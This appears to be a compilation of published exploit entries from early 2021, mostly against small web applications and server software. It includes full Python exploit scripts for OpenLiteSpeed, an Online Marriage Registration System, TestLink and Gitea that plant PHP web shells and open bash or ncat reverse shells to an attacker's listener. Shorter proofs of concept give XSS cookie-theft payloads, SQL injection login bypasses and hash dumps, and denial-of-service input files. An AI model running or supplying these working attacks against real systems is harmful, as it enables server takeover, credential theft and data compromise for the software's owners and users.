ISHACK AI BOT

# Exploit Title: Openlitespeed WebServer 1.7.8 - Command Injection (Authenticated) (2) # Date: 26/1/2021 # Exploit Author: Metin Yunus Kandemir # Discovered by: cmOs - SunCSR # Vendor Homepage: https://openlitespeed.org/ # Software Link: https://openlitespeed.org/kb/install-from-binary/ # Version: 1.7.8 import requests import sys import urllib3 from bs4 import BeautifulSoup """ Description: The "path" parameter has command injection vulnerability that leads to escalate privilege. OpenLiteSpeed (1.7.8) web server runs with user(nobody):group(nogroup) privilege. However, extUser and extGroup parameters could be used to join a group (GID) such as shadow, sudo, etc. Details: https://github.com/litespeedtech/openlitespeed/issues/217 Example: Step-1: ubuntu@ubuntu:~$ cat /etc/shadow cat: /etc/shadow: Permission denied Step-2: ubuntu@ubuntu:~$ nc -nvlp 4444 Listening on [0.0.0.0] (family 0, port 4444) Step-3: ubuntu@ubuntu:~/Desktop/exploits$ python3 openlitespeed.py 192.168.1.116:7080 admin MWE1ZmE2 shadow [+] Authentication was successful! [+] Version is detected: OpenLiteSpeed 1.7.8 [+] The target is vulnerable! [+] tk value is obtained: 0.98296300 1612966522 [+] Sending reverse shell to 127.0.0.1:4444 ... [+] Triggering command execution... Step-4: ubuntu@ubuntu:~$ nc -nvlp 4444 Listening on [0.0.0.0] (family 0, port 4444) Connection from 127.0.0.1 54534 received! cat /etc/shadow root:!:18620:0:99999:7::: daemon:*:17937:0:99999:7::: bin:*:17937:0:99999:7::: sys:*:17937:0:99999:7::: sync:*:17937:0:99999:7::: . . . """ def triggerCommandExec(target, s): data = {"act" : "restart"} trigger = s.post("https://"+target+"/view/serviceMgr.php", data = data, allow_redirects=False, verify=False) if trigger.status_code == 200: print("[+] Triggering command execution...") else: print("[-] Someting went wrong!") def commandExec(tk, groupId, s, target): data = { "name" : "lsphp", "address" : "uds://tmp/lshttpd/lsphp.sock", "note" : "", "maxConns" : "10", "env" : "PHP_LSAPI_CHILDREN=10", "initTimeout" : "60", "retryTimeout" : "0", "persistConn" : "1", "pcKeepAliveTimeout" : "", "respBuffer" : "0", "autoStart" : "2", "path" : "/usr/bin/ncat -nv 127.0.0.1 4444 -e /bin/bash", "backlog" : "100", "instances" : "1", "extUser" : "root", "extGroup" : groupId , "umask" : "", "runOnStartUp" : "1", "extMaxIdleTime" : "", "priority" : "0", "memSoftLimit" : "2047M", "memHardLimit" : "2047M", "procSoftLimit" : "1400", "procHardLimit" : "", "a" : "s", "m" : "serv", "p" : "ext", "t" : "A_EXT_LSAPI", "r" : "lsphp", "tk" : tk } exec = s.post("https://" + target + "/view/confMgr.php", data = data, allow_redirects=False, verify=False) if exec.status_code == 200: if exec.text == "Illegal entry point!": print("[-] tk value is incorrect!") sys.exit(1) else: print("[+] Sending reverse shell to 127.0.0.1:4444 ...") else: print("[-] Something went wrong!") sys.exit(1) triggerCommandExec(target, s) def loginReq(target, username, password, groupId): urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) s = requests.Session() data = {"userid" : username , "pass" : password } login = s.post("https://" + target + "/login.php" , data = data, allow_redirects=False, verify=False) if login.status_code == 302: print("[+] Authentication was successful!") elif login.status_code == 200: print("[-] Authentication was unsuccessful!") sys.exit(1) else: print("[-] Connection error!") sys.exit(1) version = s.get("https://" + target + "/index.php") versionSource = BeautifulSoup(version.text, "html.parser") v = versionSource.find('div', {'class':'project-context hidden-xs'}).text print("[+] Version is detected: OpenLiteSpeed %s" %(v.split()[2])) if v.split()[2] == "1.7.8": print("[+] The target is vulnerable!") #getting tk value getTk = s.get("https://" + target + "/view/confMgr.php?m=serv&p=ext") source = BeautifulSoup(getTk.text, 'html.parser') tk = source.find('input', {'name':'tk'}).get('value') print("[+] tk value is obtained: "+tk) commandExec(tk, groupId, s, target) def main(args): if len(args) != 5: print("usage: %s targetIp:port username password groupId " %(args[0])) print("Example: python3 openlitespeed.py 192.168.1.116:7080 admin MWE1ZmE2 shadow") sys.exit(1) loginReq(target=args[1], username=args[2], password=args[3], groupId=args[4]) if __name__ == "__main__": main(args=sys.argv)

# Exploit Title: Online Marriage Registration System (OMRS) 1.0 - Remote code execution (3) # Date: 10/02/2021 # Exploit Author: Ricardo Ruiz (@ricardojoserf) # Vendor Homepage: https://phpgurukul.com/ # Software Link: https://phpgurukul.com/online-marriage-registration-system-using-php-and-mysql/ # Version: 1.0 # Tested on: Windows 10/Xampp Server and Wamp Server # Porting an existing exploit (https://www.exploit-db.com/exploits/49260, for macOs) to Linux/Windows. Adding the possibility of automatic registration and execution of any command without needing to upload any local file # Example with registration: python3 script.py -u http://172.16.1.102:80/ -c 'whoami' # Example without registration: python3 script.py -u http://172.16.1.102:80/ -c 'whoami' -m 680123456 -p dante123 import os import sys import random import argparse import requests def get_args(): parser = argparse.ArgumentParser() parser.add_argument('-u', '--url', required=True, action='store', help='Url of Online Marriage Registration System (OMRS) 1.0') parser.add_argument('-c', '--command', required=True, action='store', help='Command to execute') parser.add_argument('-m', '--mobile', required=False, action='store', help='Mobile phone used for registration') parser.add_argument('-p', '--password', required=False, action='store', help='Password used for registration') my_args = parser.parse_args() return my_args def login(url, mobile, password): url = "%s/user/login.php"%(url) payload = {'mobno':mobile, 'password':password, 'login':''} req = requests.post(url, data=payload) return req.cookies['PHPSESSID'] def upload(url, cookie, file=None): url = "%s/user/marriage-reg-form.php"%url files = {'husimage': ('shell.php', "<?php $command = shell_exec($_REQUEST['cmd']); echo $command; ?>", 'application/x-php', {'Expires': '0'}), 'wifeimage':('test.jpg','','image/jpeg')} payload = {'dom':'05/01/2020','nofhusband':'omrs_rce', 'hreligion':'omrs_rce', 'hdob':'05/01/2020','hsbmarriage':'Bachelor','haddress':'omrs_rce','hzipcode':'omrs_rce','hstate':'omrs_rce','hadharno':'omrs_rce','nofwife':'omrs_rce','wreligion':'omrs_rce','wsbmarriage':'Bachelor','waddress':'omrs_rce','wzipcode':'omrs_rce','wstate':'omrs_rce','wadharno':'omrs_rce','witnessnamef':'omrs_rce','waddressfirst':'omrs_rce','witnessnames':'omrs_rce','waddresssec':'omrs_rce','witnessnamet':'omrs_rce','waddressthird':'omrs_rce','submit':''} req = requests.post(url, data=payload, cookies={'PHPSESSID':cookie}, files=files) print('[+] PHP shell uploaded') def get_remote_php_files(url): url = "%s/user/images"%(url) req = requests.get(url) php_files = [] for i in req.text.split(".php"): php_files.append(i[-42:]) return php_files def exec_command(url, webshell, command): url_r = "%s/user/images/%s?cmd=%s"%(url, webshell, command) req = requests.get(url_r) print("[+] Command output\n%s"%(req.text)) def register(mobile, password, url): url_r = "%s/user/signup.php"%(url) data = {"fname":"omrs_rce", "lname":"omrs_rce", "mobno":mobile, "address":"omrs_rce", "password":password, "submit":""} req = requests.post(url_r, data=data) print("[+] Registered with mobile phone %s and password '%s'"%(mobile,password)) if __name__ == "__main__": args = get_args() url = args.url command = args.command mobile = str(random.randint(100000000,999999999)) if args.mobile is None else args.mobile password = "dante123" if args.password is None else args.password if args.password is None or args.mobile is None: register(mobile,password,url) cookie = login(url, mobile, password) initial_php_files = get_remote_php_files(url) upload(url, cookie) final_php_files = get_remote_php_files(url) webshell = (list(set(final_php_files) - set(initial_php_files))[0]+".php") exec_command(url,webshell,command)

# Exploit Title: PDFCOMPLETE Corporate Edition 4.1.45 - 'pdfcDispatcher' Unquoted Service Path # Discovery by: Ismael Nava # Discovery Date: 02-11-2020 # Vendor Homepage: https://www.pdfcomplete.com/cms/dpl/tabid/111/Default.aspx?r=du2vH8r # Software Links : https://pdf-complete.informer.com/download/ # Tested Version: 4.1.45 # Vulnerability Type: Unquoted Service Path # Tested on OS: Windows 10 64 bits # Step to discover Unquoted Service Path: C:\>wmic service get name, displayname, pathname, startmode | findstr /i "Auto" | findstr /i /v "C:\Windows\\" |findstr /i /v """ PDF Document Manager pdfcDispatcher C:\Program Files (x86)\PDF Complete\pdfsvc.exe /startedbyscm:66B66708-40E2BE4D-pdfcService Auto C:\>sc qc pdfcDispatcher [SC] QueryServiceConfig CORRECTO NOMBRE_SERVICIO: pdfcDispatcher TIPO : 10 WIN32_OWN_PROCESS TIPO_INICIO : 2 AUTO_START CONTROL_ERROR : 1 NORMAL NOMBRE_RUTA_BINARIO: C:\Program Files (x86)\PDF Complete\pdfsvc.exe /startedbyscm:66B66708-40E2BE4D-pdfcService GRUPO_ORDEN_CARGA : ETIQUETA : 0 NOMBRE_MOSTRAR : PDF Document Manager DEPENDENCIAS : NOMBRE_INICIO_SERVICIO: LocalSystem

# Exploit Title: School File Management System 1.0 - 'multiple' Stored Cross-Site Scripting # Date: 2021-02-11 # Exploit Author: Pintu Solanki # Vendor Homepage: https://www.sourcecodester.com/ # Software Link: https://www.sourcecodester.com/php/14155/school-file-management-system.html # Software: : School File Management System 1.0 # Tested On: Windows 10 Pro 10.0.18363 N/A Build 18363 + XAMPP V3.2.4 # Vulnerable Page: http://localhost/School%20File%20Management%20System/student_profile.php # Vulnerable functionality: 'Update Account' # Vulnerable Input Field : {Firtstname} {Lastname} # Payload used: "><script>alert(document.cookie)</script> # POC: Whenever we will go to the page (http://localhost/School%20File%20Management%20System/student_profile.php) where the script is injected, the stored script will be executed. # You will see your Javascript code (XSS) executed.

# Exploit Title: TestLink 1.9.20 - Unrestricted File Upload (Authenticated) # Date: 14th February 2021 # Exploit Author: snovvcrash # Original Research by: Ackcent AppSec Team # Original Research: https://ackcent.com/testlink-1-9-20-unrestricted-file-upload-and-sql-injection/ # Vendor Homepage: https://testlink.org/ # Software Link: https://github.com/TestLinkOpenSourceTRMS/testlink-code # Version: 1.9.20 # Tested on: Ubuntu 20.10 # CVE: CVE-2020-8639 # Requirements: pip3 install -U requests bs4 # Usage Example: ./exploit.py -u admin -p admin -P 127.0.0.1:8080 http://127.0.0.1/testlink """ Raw exploit request: POST /testlink/lib/keywords/keywordsImport.php HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: multipart/form-data; boundary=---------------------------242818621515179709592867995067 Content-Length: 1187 Origin: http://127.0.0.1 Connection: close Referer: http://127.0.0.1/testlink//lib/keywords/keywordsImport.php?tproject_id=1 Cookie: PHPSESSID=kvbpl3t3lec42qbjdcgdppncib; TESTLINK1920TESTLINK_USER_AUTH_COOKIE=af57ebce9f54ce0f0e36d24ef25dc9c1b3a9d2f8e0b9cb4454c973927306e90f Upgrade-Insecure-Requests: 1 -----------------------------242818621515179709592867995067 Content-Disposition: form-data; name="CSRFName" CSRFGuard_1115715115 -----------------------------242818621515179709592867995067 Content-Disposition: form-data; name="CSRFToken" 506c4b44825c5e5885231c263e7195188dedbd154b9cf74e5d183c1feb953aec7c0edae1097649d82acd20f6f851e0cdbac91cc0589d1cfd6fb13741f9cf0cb8 -----------------------------242818621515179709592867995067 Content-Disposition: form-data; name="importType" /../../../logs/pwn.php -----------------------------242818621515179709592867995067 Content-Disposition: form-data; name="MAX_FILE_SIZE" 409600 -----------------------------242818621515179709592867995067 Content-Disposition: form-data; name="uploadedFile"; filename="foo.xml" Content-Type: application/xml <?php if(isset($_REQUEST['c'])){system($_REQUEST['c'].' 2>&1' );} ?> -----------------------------242818621515179709592867995067 Content-Disposition: form-data; name="tproject_id" 1 -----------------------------242818621515179709592867995067 Content-Disposition: form-data; name="UploadFile" Upload file -----------------------------242818621515179709592867995067-- """ #!/usr/bin/env python3 import re from urllib import parse from cmd import Cmd from base64 import b64encode from argparse import ArgumentParser import requests from bs4 import BeautifulSoup parser = ArgumentParser() parser.add_argument('target', help='target full URL without trailing slash, ex. "http://127.0.0.1/testlink"') parser.add_argument('-u', '--username', default='admin', help='TestLink username') parser.add_argument('-p', '--password', default='admin', help='TestLink password') parser.add_argument('-P', '--proxy', default=None, help='HTTP proxy in format <HOST:PORT>, ex. "127.0.0.1:8080"') args = parser.parse_args() class TestLinkWebShell(Cmd): payloadPHP = """<?php if(isset($_REQUEST['c'])){system($_REQUEST['c'].' 2>&1' );} ?>""" uploadPath = 'logs/pwn.php' prompt = '$ ' def __init__(self, target, username, password, proxies): super().__init__() self.target = target self.username = username self.password = password if proxies: self.proxies = {'http': f'http://{proxies}', 'https': f'http://{proxies}'} else: self.proxies = None self.session = requests.Session() self.session.verify = False resp = self.session.get(f'{self.target}/login.php', proxies=self.proxies) soup = BeautifulSoup(resp.text, 'html.parser') self.csrf_name = soup.find('input', {'name': 'CSRFName'}).get('value') self.csrf_token = soup.find('input', {'name': 'CSRFToken'}).get('value') self.req_uri = soup.find('input', {'name': 'reqURI'}).get('value') self.destination = soup.find('input', {'name': 'destination'}).get('value') def auth(self): data = { 'CSRFName': self.csrf_name, 'CSRFToken': self.csrf_token, 'reqURI': self.req_uri, 'destination': self.destination, 'tl_login': self.username, 'tl_password': self.password } resp = self.session.post(f'{self.target}/login.php?viewer=', data=data, proxies=self.proxies) if resp.status_code == 200: print('[*] Authentication succeeded') resp = self.session.get(f'{self.target}/lib/general/mainPage.php', proxies=self.proxies) if resp.status_code == 200: print('[*] Loaded mainPage.php iframe contents') soup = BeautifulSoup(resp.text, 'html.parser') self.tproject_id = soup.find('a', {'href': re.compile(r'lib/keywords/keywordsView.php\?')}).get('href') self.tproject_id = parse.parse_qs(parse.urlsplit(self.tproject_id).query)['tproject_id'][0] print(f'[+] Extracted tproject_id value: {self.tproject_id}') else: raise Exception('Error loading mainPage.php iframe contents') else: raise Exception('Authentication failed') def upload_web_shell(self): files = [ ('CSRFName', (None, self.csrf_name)), ('CSRFToken', (None, self.csrf_token)), ('importType', (None, f'/../../../{TestLinkWebShell.uploadPath}')), ('MAX_FILE_SIZE', (None, '409600')), ('uploadedFile', ('foo.xml', TestLinkWebShell.payloadPHP)), ('tproject_id', (None, self.tproject_id)), ('UploadFile', (None, 'Upload file')) ] resp = self.session.post(f'{self.target}/lib/keywords/keywordsImport.php', files=files, proxies=self.proxies) if resp.status_code == 200: print(f'[*] Web shell uploaded here: {self.target}/{TestLinkWebShell.uploadPath}') print('[*] Trying to query whoami...') resp = self.session.get(f'{self.target}/{TestLinkWebShell.uploadPath}?c=whoami', proxies=self.proxies) if resp.status_code == 200: print(f'[+] Success! Starting semi-interactive shell as {resp.text.strip()}') else: raise Exception('Error interacting with the web shell') else: raise Exception('Error uploading web shell') def emptyline(self): pass def preloop(self): self.auth() self.upload_web_shell() def default(self, args): try: resp = self.session.get(f'{self.target}/{TestLinkWebShell.uploadPath}?c={args}', proxies=self.proxies) if resp.status_code == 200: print(resp.text.strip()) except Exception as e: print(f'*** Something weired happened: {e}') def do_spawn(self, args): """Spawn a reverse shell. Usage: \"spawn <LHOST> <LPORT>\".""" try: lhost, lport = args.split() payload = f'/bin/bash -i >& /dev/tcp/{lhost}/{lport} 0>&1' b64_payload = b64encode(payload.encode()).decode() cmd = f'echo {b64_payload} | base64 -d | /bin/bash' self.default(cmd) except Exception as e: print(f'*** Something weired happened: {e}') def do_EOF(self, args): """Use Ctrl-D to exit the shell.""" print(); return True if __name__ == '__main__': tlws = TestLinkWebShell(args.target, args.username, args.password, args.proxy) tlws.cmdloop('Type help for list of commands')

# Exploit Title: School Event Attendance Monitoring System 1.0 - 'Item Name' Stored Cross-Site Scripting # Date: 2021-02-11 # Exploit Author: Suresh Kumar # Vendor Homepage: https://www.sourcecodester.com/ # Software Link: https://www.sourcecodester.com/php/12613/php-attendance-monitoring-system-barcode-scanning.html # Software: School Event Attendance Monitoring System 1.0 # Tested on Windows 10 XAMPP # This application is vulnerable to Stored XSS vulnerability. # Vulnerable Page: http://localhost/attendance/sanction # Vulnerable functionality: 'Add Sanction ' # Vulnerable Input Field : Item Name # Payload used: "><script>alert(document.cookie)</script> # POC: Whenever we will go to the page (http://localhost/attendance/sanction) where the script is injected, the stored script will be executed. # You will see your Javascript code (XSS) executed.

# Exploit Title: Teachers Record Management System 1.0 - 'searchteacher' SQL Injection # Date: 13/02/2021 # Exploit Author: Soham Bakore, Nakul Ratti # Vendor Homepage: https://www.sourcecodester.com/ # Software Link: https://www.sourcecodester.com/php/14399/teacher-record-system-phpmysql.html # Version:1.0 # Tested on: latest version of Chrome, Firefox on Windows and Linux --------------------------Proof of Concept----------------------- 1. Navigate to http://host/trms/ 2. The "searchteacher" parameter in search-teacher.php is vulnerable to SQL injection 3. Below curl request will display the admin username and password hash ------------------------Exploit request----------------------------- curl -i -s -k -X $'POST' \ -H $'Host: 192.168.1.13' -H $'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0' -H $'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8' -H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate' -H $'Content-Type: application/x-www-form-urlencoded' -H $'Content-Length: 130' -H $'Origin: http://192.168.1.17' -H $'DNT: 1' -H $'Connection: close' -H $'Referer: http://192.168.1.13/trms/' -H $'Cookie: PHPSESSID=t2lshgnjhov62o1s0q0iq331p9' -H $'Upgrade-Insecure-Requests: 1' \ -b $'PHPSESSID=t2lshgnjhov62o1s0q0iq331p9' \ --data-binary $'searchteacher=Arts\'+union+select+1,concat(\'Username:\',UserName),3,concat(\'Password:\',Password),5,6,7,8,9,10+from+tbladmin#&search=' \ $'http://host/trms/search-teacher.php'

# Exploit Title: Tasks 9.7.3 - Insecure Permissions # Date: 18th of July, 2020 # Exploit Author: Lyhin's Lab # Detailed Bug Description: https://lyhinslab.org/index.php/2020/07/18/how-the-white-box-hacking-works-ok-google-i-wanna-pwn-this-app/ # Vendor Homepage: https://tasks.org/ # Software Link: https://github.com/tasks/tasks # Version: 9.7.3 # Tested on: Android 9 Any installed application on a victim's phone can add arbitrary tasks to users through insecure IPC handling. A malicious application has several ways of how to achieve that: 1. By sending multiple intents to ShareLink activity (com/todoroo/astrid/activity/ShareLinkActivity.java). Tasks application adds the first requested "task" to the user's task list. 2. By sending an intent to VoiceCommand activity (org/tasks/voice/VoiceCommandActivity.java). The application does not validate intent's origin, so any application can append tasks to the user's task list. We used the Drozer application to emulate malicious app activity. Please find the commands below. run app.activity.start --component org.tasks.debug com.todoroo.astrid.activity.ShareLinkActivity --action=android.intent.action.PROCESS_TEXT --extra string android.intent.extra.PROCESS_TEXT "Kill Mufasa" run app.activity.start --component org.tasks.debug org.tasks.voice.VoiceCommandActivity --action=com.google.android.gm.action.AUTO_SEND --extra string android.intent.extra.TEXT "Visit https://lyhinslab.org"

# Exploit Title: Online Internship Management System 1.0 - 'email' SQL injection Auth Bypass # Date: 16-02-2021 # Exploit Author: Christian Vierschilling # Vendor Homepage: https://www.sourcecodester.com # Software Link: https://www.sourcecodester.com/php/14712/online-internship-management-system-phpmysqli-full-source-code.html # Version: 1.0 # Tested on: PHP 7.4.14, Linux x64_x86 # --- Description --- # The application contains sql injections in the parameters 'email' and 'password' in the file 'login.php'. # --- Proof of concept --- # Curl request for authentication bypass via sql injection in parameter 'email': curl http://x.x.x.x/internship/login.php --data "email='%20or%201=1;#&password=none&login="

# Exploit Title: BlackCat CMS 1.3.6 - 'Display name' Cross Site Scripting (XSS) # Date: 16-02-2021 # Exploit Author: Kamaljeet Kumar - TATA Advanced Systems Limited # Vendor Homepage: https://blackcat-cms.org/ # Software Link: https://blackcat-cms.org/page/download.php # Version: BlackCat CMS - 1.3.6 # Tested on: Windows # Steps to Reproduce: 1. To exploit this vulnerability an attacker has a login in the admin panel and clicks on the admin profile button. Then use " onmouseover=alert(1) " this XSS payload on Display name field and click on the Save button. 2 .Then refresh the page and hover the mouse on Display name filed and our XSS message pop up.

# Exploit Title: Managed Switch Port Mapping Tool 2.85.2 - Denial of Service (PoC) # Date: 2021-02-15 # Exploit Author: Ismael Nava # Vendor Homepage: https://switchportmapper.com/ # Software Link: https://switchportmapper.com/download.htm # Version: 2.85.2 # Tested on: Windows 10 Home x64 #STEPS # Open the program Managed Switch Port Mapping Tool # In the left side select Settings from Router/Srvr 1 (for layer 2 Switches) # Run the python exploit script, it will create a new .txt files # Copy the content of the file "Gou.txt" # Paste the content in the field IP Address and SNMP v1/v2c Read Community Name # Click in OK # End :) buffer = 'F' * 10000 try: file = open("Gou2.txt","w") file.write(buffer) file.close() print("Archive ready") except: print("Archive no ready")

# Exploit Title: AgataSoft PingMaster Pro 2.1 - Denial of Service (PoC) # Date: 2021-02-15 # Exploit Author: Ismael Nava # Vendor Homepage: http://agatasoft.com/ # Software Link: http://agatasoft.com/Ping_Master_Pro.exe # Version: 2.1 # Tested on: Windows 10 Home x64 #STEPS # Open the program AgataSoft PingMaster Pro # In Tools select the option Trace Route # Run the python exploit script, it will create a new .txt files # Copy the content of the file "Gou.txt" # Paste the content in the field Host name and click in Get IP from host name # End :) buffer = 'S' * 10000 try: file = open("Gou.txt","w") file.write(buffer) file.close() print("Archive ready") except: print("Archive no ready")

# Exploit Title: Nsauditor 3.2.2.0 - 'Event Description' Denial of Service (PoC) # Date: 2021-02-15 # Exploit Author: Ismael Nava # Vendor Homepage: https://www.nsauditor.com/ # Software Link: http://www.nsauditor.com/downloads/nsauditor_setup.exe # Version: 3.2.2.0 # Tested on: Windows 10 Home x64 #STEPS # Open the program Nsauditor # In Options select Configuration... # Click in Security Events # Run the python exploit script, it will create a new .txt files # Copy the content of the file "Liella.txt" # Paste the content in the field Event Description and click in Add Event # End :) buffer = 'U' * 10000 try: file = open("Liella.txt","w") file.write(buffer) file.close() print("Archive ready") except: print("Archive no ready")

# Exploit Title: Faulty Evaluation System 1.0 - 'multiple' Stored Cross-Site Scripting # Date: 2021-02-16 # Exploit Author: Suresh Kumar # Vendor Homepage: https://www.sourcecodester.com/ # Software Link: https://www.sourcecodester.com/php/14710/faulty-evaluation-system-using-phpcodeigniter-source-code.html # Software: Faulty Evaluation System 1.0 # Tested On: Windows 10 Pro 10.0.18363 N/A Build 18363 + XAMPP V3.2.4 # Vulnerable Page: http://localhost/evaluation/student/list # Vulnerable functionality: 'Student' # Vulnerable Input Field : {Firtstname} {Lastname} {Middle Name} # Payload used: <a onmouseover="alert(document.cookie)">xxs link</a> # POC: Whenever we will go to the page ( http://localhost/evaluation/student/list) where the script is injected, the stored script will be executed. # You will see your Javascript code (XSS) executed.

# Exploit Title: Billing Management System 2.0 - 'email' SQL injection Auth Bypass # Date: 2021-02-16 # Exploit Author: Pintu Solanki # Vendor Homepage: https://www.sourcecodester.com/ # Software Link: https://www.sourcecodester.com/php/14380/billing-management-system-php-mysql-updated.html # Software: Billing Management System 2.0 # Vulnerability Type: SQL injection - Auth Bypass # Tested On: Windows 10 Pro 10.0.18363 N/A Build 18363 + XAMPP V3.2.4 # This application is vulnerable to SQL injection vulnerability. # Vulnerable Page: http://localhost/smartbilling/smartbilling_source_code/index.php # Payload used: Username => admin' or '1'='1 Password => admin' or '1'='1 # POC: Whenever we will go to the page (http://localhost/smartbilling/smartbilling_source_code/index.php) when we inject SQL Payload then we will directly enter into the admin page.

# Exploit Title: Gitea 1.12.5 - Remote Code Execution (Authenticated) # Date: 17 Feb 2020 # Exploit Author: Podalirius # PoC demonstration article: https://podalirius.net/en/articles/exploiting-cve-2020-14144-gitea-authenticated-remote-code-execution/ # Vendor Homepage: https://gitea.io/ # Software Link: https://dl.gitea.io/ # Version: >= 1.1.0 to <= 1.12.5 # Tested on: Ubuntu 16.04 with GiTea 1.6.1 #!/usr/bin/env python3 # -*- coding: utf-8 -*- import argparse import os import pexpect import random import re import sys import time import requests requests.packages.urllib3.disable_warnings() requests.packages.urllib3.util.ssl_.DEFAULT_CIPHERS += ':HIGH:!DH:!aNULL' try: requests.packages.urllib3.contrib.pyopenssl.util.ssl_.DEFAULT_CIPHERS += ':HIGH:!DH:!aNULL' except AttributeError: pass class GiTea(object): def __init__(self, host, verbose=False): super(GiTea, self).__init__() self.verbose = verbose self.host = host self.username = None self.password = None self.uid = None self.session = None def _get_csrf(self, url): pattern = 'name="_csrf" content="([a-zA-Z0-9\-\_=]+)"' csrf = [] while len(csrf) == 0: r = self.session.get(url) csrf = re.findall(pattern, r.text) time.sleep(1) csrf = csrf[0] return csrf def _get_uid(self, url): pattern = 'name="_uid" content="([0-9]+)"' uid = re.findall(pattern, self.session.get(url).text) while len(uid) == 0: time.sleep(1) uid = re.findall(pattern, self.session.get(url).text) uid = uid[0] return int(uid) def login(self, username, password): if self.verbose == True: print(" [>] login('%s', ...)" % username) self.session = requests.Session() r = self.session.get('%s/user/login' % self.host) self.username = username self.password = password # Logging in csrf = self._get_csrf(self.host) r = self.session.post( '%s/user/login?redirect_to=%%2f%s' % (self.host, self.username), data = {'_csrf':csrf, 'user_name':username, 'password':password}, allow_redirects=True ) if b'Username or password is incorrect.' in r.content: return False else: # Getting User id self.uid = self._get_uid(self.host) return True def repo_create(self, repository_name): if self.verbose == True: print(" [>] Creating repository : %s" % repository_name) csrf = self._get_csrf(self.host) # Create repo r = self.session.post( '%s/repo/create' % self.host, data = { '_csrf' : csrf, 'uid' : self.uid, 'repo_name' : repository_name, 'description' : "Lorem Ipsum", 'gitignores' : '', 'license' : '', 'readme' : 'Default', 'auto_init' : 'off' } ) return None def repo_delete(self, repository_name): if self.verbose == True: print(" [>] Deleting repository : %s" % repository_name) csrf = self._get_csrf('%s/%s/%s/settings' % (self.host, self.username, repository_name)) # Delete repository r = self.session.post( '%s/%s/%s/settings' % (self.host, self.username, repository_name), data = { '_csrf' : csrf, 'action' : "delete", 'repo_name' : repository_name } ) return def repo_set_githook_pre_receive(self, repository_name, content): if self.verbose == True: print(" [>] repo_set_githook_pre_receive('%s')" % repository_name) csrf = self._get_csrf('%s/%s/%s/settings/hooks/git/pre-receive' % (self.host, self.username, repository_name)) # Set pre receive git hook r = self.session.post( '%s/%s/%s/settings/hooks/git/pre-receive' % (self.host, self.username, repository_name), data = { '_csrf' : csrf, 'content' : content } ) return def repo_set_githook_update(self, repository_name, content): if self.verbose == True: print(" [>] repo_set_githook_update('%s')" % repository_name) csrf = self._get_csrf('%s/%s/%s/settings/hooks/git/update' % (self.host, self.username, repository_name)) # Set update git hook r = self.session.post( '%s/%s/%s/settings/hooks/git/update' % (self.host, self.username, repository_name), data = { '_csrf' : csrf, 'content' : content } ) return def repo_set_githook_post_receive(self, repository_name, content): if self.verbose == True: print(" [>] repo_set_githook_post_receive('%s')" % repository_name) csrf = self._get_csrf('%s/%s/%s/settings/hooks/git/post-receive' % (self.host, self.username, repository_name)) # Set post receive git hook r = self.session.post( '%s/%s/%s/settings/hooks/git/post-receive' % (self.host, self.username, repository_name), data = { '_csrf' : csrf, 'content' : content } ) return def logout(self): if self.verbose == True: print(" [>] logout()") # Logging out r = self.session.get('%s/user/logout' % self.host) return None def trigger_exploit(host, username, password, repository_name, verbose=False): # Create a temporary directory tmpdir = os.popen('mktemp -d').read().strip() os.chdir(tmpdir) # We create some files in the repository os.system('touch README.md') rndstring = ''.join([hex(random.randint(0,15))[2:] for k in range(32)]) os.system('echo "%s" >> README.md' % rndstring) os.system('git init') os.system('git add README.md') os.system('git commit -m "Initial commit"') # Connect to remote source repository os.system('git remote add origin %s/%s/%s.git' % (host, username, repository_name)) # Push the files (it will trigger post-receive git hook) conn = pexpect.spawn("/bin/bash -c 'cd %s && git push -u origin master'" % tmpdir) conn.expect("Username for .*: ") conn.sendline(username) conn.expect("Password for .*: ") conn.sendline(password) conn.expect("Total.*") print(conn.before.decode('utf-8').strip()) return None def header(): print(""" _____ _ _______ / ____(_)__ __| CVE-2020-14144 | | __ _ | | ___ __ _ | | |_ | | | |/ _ \/ _` | Authenticated Remote Code Execution | |__| | | | | __/ (_| | \_____|_| |_|\___|\__,_| GiTea versions >= 1.1.0 to <= 1.12.5 """) if __name__ == '__main__': header() parser = argparse.ArgumentParser(description='Process some integers.') parser.add_argument('-v','--verbose', required=False, default=False, action='store_true', help='Increase verbosity.') parser.add_argument('-t','--target', required=True, type=str, help='Target host (http://..., https://... or domain name)') parser.add_argument('-u','--username', required=True, type=str, default=None, help='GiTea username') parser.add_argument('-p','--password', required=True, type=str, default=None, help='GiTea password') parser.add_argument('-I','--rev-ip', required=False, type=str, default=None, help='Reverse shell listener IP') parser.add_argument('-P','--rev-port', required=False, type=int, default=None, help='Reverse shell listener port') parser.add_argument('-f','--payload-file', required=False, default=None, help='Path to shell script payload to use.') args = parser.parse_args() if (args.rev_ip == None or args.rev_port == None): if args.payload_file == None: print('[!] Either (-I REV_IP and -P REV_PORT) or (-f PAYLOAD_FILE) options are needed') sys.exit(-1) # Read specific payload file if args.payload_file != None: f = open(args.payload_file, 'r') hook_payload = ''.join(f.readlines()) f.close() else: hook_payload = """#!/bin/bash\nbash -i >& /dev/tcp/%s/%d 0>&1 &\n""" % (args.rev_ip, args.rev_port) if args.target.startswith('http://'): pass elif args.target.startswith('https://'): pass else: args.target = 'https://' + args.target print('[+] Starting exploit ...') g = GiTea(args.target, verbose=args.verbose) if g.login(args.username, args.password): reponame = 'vuln' g.repo_delete(reponame) g.repo_create(reponame) g.repo_set_githook_post_receive(reponame, hook_payload) g.logout() trigger_exploit(g.host, g.username, g.password, reponame, verbose=args.verbose) g.repo_delete(reponame) else: print('\x1b[1;91m[!]\x1b[0m Could not login with these credentials.') print('[+] Exploit completed !')

